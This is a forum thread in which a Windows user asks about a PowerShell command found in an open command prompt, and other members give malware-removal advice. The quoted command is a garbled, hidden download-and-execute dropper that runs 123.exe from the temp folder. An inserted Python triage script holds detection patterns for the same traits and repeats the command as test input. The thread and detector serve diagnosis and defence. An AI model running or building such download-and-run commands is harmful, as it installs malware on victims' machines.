Possible Computer Virus?
Member
Posts: 2,941
Joined: Jun 14 2010
Gold: 1,120.00
Oct 10 2017 03:01pm
I was away from my computer for a couple hours. I came back to my desk, and found a command prompt open with the following:

Quote
C:\Users\User>%WINDIR%\System32\Winidden -Exec Bypass "IEX (New-Object SyP em.Net.W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('ht.exe/"); Start-Process \"$env:temp\123.exe\"
'C:\WINDOWS\System32\Winidden' is not recognized as an internal or external command, operable program or batch file.

C:\Users\User>\123.exe\"); Start-Process \"$env:temp\123.exe\"
'\123.exe\"); Start-Process \"$env:temp\123.exe\"' is not recognized as an internal or external command,
operable program or batch file.


I'm not entirely sure what to make of that message. For AV, I just use Windows Defender, as I'm not out there doing crazy stuff. It's up to date, but a full scan showed nothing. I also downloaded, updated, and ran full scans on Spybot and Malwarebytes. Both scans showed no threats found.

My computer is a very simple Windows 10 setup. I have POESkillTree, Path of Building, Discord, Steam, Pokerstars, and Chrome on the machine.

Does anyone have any thoughts and/or insight into what could be causing this?
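
Added example, not part of the original post: a small Python triage check that scores a logged process command line (for instance from process-creation auditing) for the traits visible in the command above: hidden window, execution-policy bypass, IEX, a WebClient download, and Start-Process from the temp directory. The names `TRAITS`, `traits` and `is_suspicious`, the patterns and the scoring rule are assumptions made for illustration.

```python
import re

# Traits visible in the command from the post. The patterns and the scoring
# rule are illustrative assumptions, not a vetted detection signature.
TRAITS = {
    "hidden_window": re.compile(r"\bhidden\b", re.I),
    "policy_bypass": re.compile(r"-(?:ep|ex\w*)\s+bypass\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_download": re.compile(
        r"\b(?:net\.webclient|downloadfile|downloadstring|invoke-webrequest)\b", re.I),
    "run_from_temp": re.compile(
        r"start-process\b.*(?:\$env:temp|%temp%|\\appdata\\local\\temp\\)", re.I),
}

def traits(cmdline):
    """Return the names of the traits found, in TRAITS order."""
    return [name for name, rx in TRAITS.items() if rx.search(cmdline)]

def is_suspicious(cmdline):
    """Flag on three or more traits, or on download plus run-from-temp."""
    found = set(traits(cmdline))
    return len(found) >= 3 or {"web_download", "run_from_temp"} <= found

# POST_LINE and POST_FRAGMENT are copied from the post (already garbled there);
# the CONSTRUCTED lines are made-up benign samples for comparison.
POST_LINE = r'''%WINDIR%\System32\Winidden -Exec Bypass "IEX (New-Object SyP em.Net.W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('ht.exe/"); Start-Process \"$env:temp\123.exe\"'''
POST_FRAGMENT = r'''\123.exe\"); Start-Process \"$env:temp\123.exe\"'''
CONSTRUCTED = [
    r'powershell.exe -NoProfile -Command "Get-ChildItem $env:temp"',
    r'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
]

if __name__ == "__main__":
    for line in [POST_LINE, POST_FRAGMENT, *CONSTRUCTED]:
        verdict = "SUSPICIOUS" if is_suspicious(line) else "ok"
        print(f"{verdict:10} {traits(line)}  <-  {line[:60]}")
```

A single trait, such as an execution-policy bypass in an admin script, is common on its own, which is why the check only flags combinations.
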
Member
Posts: 104,175
Joined: Apr 25 2006
Gold: 10,655.00
Oct 10 2017 06:43pm

nvm.

This post was edited by Ghot on Oct 10 2017 06:46pm
Member
Posts: 32,103
Joined: Dec 29 2009
Gold: 0.00
Oct 10 2017 08:08pm
Sounds like malware of some sort. Run Malwarebytes
Member
Posts: 109,870
Joined: Feb 1 2006
Gold: 18,352.00
Oct 10 2017 08:09pm
Quote (Surfpunk @ Oct 10 2017 09:08pm)
Sounds like malware of some sort. Run Malwarebytes


he did.

Run ESET Online Scanner, preferably in safe mode.
Same goes for Malwarebytes if it wasn't in safe mode.

Member
Posts: 10,281
Joined: Jan 7 2015
Gold: Locked
Warn: 60%
Oct 10 2017 08:21pm
spooky
Member
Posts: 20,973
Joined: Apr 19 2006
Gold: 84.10
Oct 10 2017 10:02pm
Quote (DCSS @ Oct 10 2017 09:21pm)
spooky


Exactly 123.exe

Member
Posts: 104,175
Joined: Apr 25 2006
Gold: 10,655.00
Member
Posts: 10,281
Joined: Jan 7 2015
Gold: Locked
Warn: 60%
Oct 10 2017 10:38pm
gah i had tdss rootkit on windows xp way back in the day and it was the most annoying shit
killed it with combofix
Member
Posts: 32,103
Joined: Dec 29 2009
Gold: 0.00
Oct 11 2017 10:37am
Quote (King Atrhur @ Oct 10 2017 09:09pm)
he did.

Run ESET Online Scanner, preferably in safe mode.
Same goes for Malwarebytes if it wasn't in safe mode.


D'oh. :blush:

Grab Autoruns from Sysinternals (Microsoft). Run that, see if it finds a launch trigger for that 123.exe bit, and delete the entry. See if that makes it go away.
Member
Posts: 2,941
Joined: Jun 14 2010
Gold: 1,120.00
Oct 11 2017 09:18pm
Quote (King Atrhur @ Oct 10 2017 08:09pm)
he did.

Run ESET Online Scanner, preferably in safe mode.
Same goes for Malwarebytes if it wasn't in safe mode.


Hopefully that did it. Of everything mentioned here, ESET Online is the only thing that found anything. It found two entries of the Crysis Trojan, which it was able to clean, so hopefully that's that. Thanks for your help guys.